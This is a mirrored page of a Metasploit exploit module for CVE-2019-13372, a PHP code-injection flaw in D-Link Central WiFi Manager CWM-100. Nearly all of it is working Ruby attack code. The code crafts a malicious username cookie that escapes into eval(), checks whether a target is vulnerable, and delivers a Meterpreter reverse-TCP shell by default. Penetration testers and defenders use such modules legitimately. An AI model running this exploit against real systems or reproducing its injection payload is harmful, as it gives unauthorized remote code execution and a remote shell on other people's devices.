CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/dlink_central_wifimanager_rce.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  prepend Msf::Exploit::Remote::AutoCheck

10
  include Msf::Exploit::Remote::HttpClient

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'D-Link Central WiFi Manager CWM(100) RCE',

17
        'Description' => %q{

18
          This module exploits a PHP code injection vulnerability in D-Link Central WiFi Manager CWM(100)

19
          versions below `v1.03R0100_BETA6`. The vulnerability exists in the

20
          username cookie, which is passed to `eval()` without being sanitized.

21
          Dangerous functions are not disabled by default, which makes it possible

22
          to get code execution on the target.

23
        },

24
        'License' => MSF_LICENSE,

25
        'Author' => [

26
          'M3@ZionLab from DBAppSecurity', # Original discovery

27
          'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # PoC, metasploit module

28
        ],

29
        'References' => [

30
          ['CVE', '2019-13372'],

31
          ['URL', 'https://unh3x.github.io/2019/02/21/D-link-(CWM-100)-Multiple-Vulnerabilities/' ]

32
        ],

33
        'Targets' => [ [ 'Automatic', {}] ],

34
        'DefaultTarget' => 0,

35
        'DefaultOptions' => {

36
          'PAYLOAD' => 'php/meterpreter/reverse_tcp',

37
          'SSL' => true,

38
          'RPORT' => 443

39
        },

40
        'Platform' => %w[php],

41
        'Arch' => [ ARCH_PHP ],

42
        'DisclosureDate' => '2019-07-09',

43
        'Notes' => {

44
          'Stability' => [ CRASH_SAFE ],

45
          'SideEffects' => [ IOC_IN_LOGS ],

46
          'Reliability' => [ REPEATABLE_SESSION ]

47
        }

48
      )

49
    )

50


51
    register_options(

52
      [

53
        OptString.new('TARGETURI', [true, 'The base path to to the web application', '/'])

54
      ]

55
    )

56
  end

57


58
  def inject_php(cmd)

59
    encode_char = ->(char) { "%#{char.ord.to_s(16).rjust(2, '0')}" }

60
    payload = "',0,\"\",1,\"0\")%3b#{cmd.gsub(/[;\s]/, &encode_char)}%3b//\""

61
    res = send_request_cgi(

62
      'method' => 'GET',

63
      'uri' => normalize_uri(target_uri, 'index.php', 'Index', 'index'),

64
      'cookie' => "username=#{payload};password="

65
    )

66
    res ? res.body[/^(.*?)<!DOCTYPE html>/mi, 1] : nil

67
  end

68


69
  def check

70
    rand_text = Rex::Text.rand_text_alphanumeric(rand(4..10))

71
    if inject_php("echo \"#{rand_text}\"")&.chomp == rand_text

72
      return Exploit::CheckCode::Vulnerable

73
    end

74


75
    Exploit::CheckCode::Unknown

76
  end

77


78
  def exploit

79
    inject_php(payload.raw)

80
  end

81
end

82


83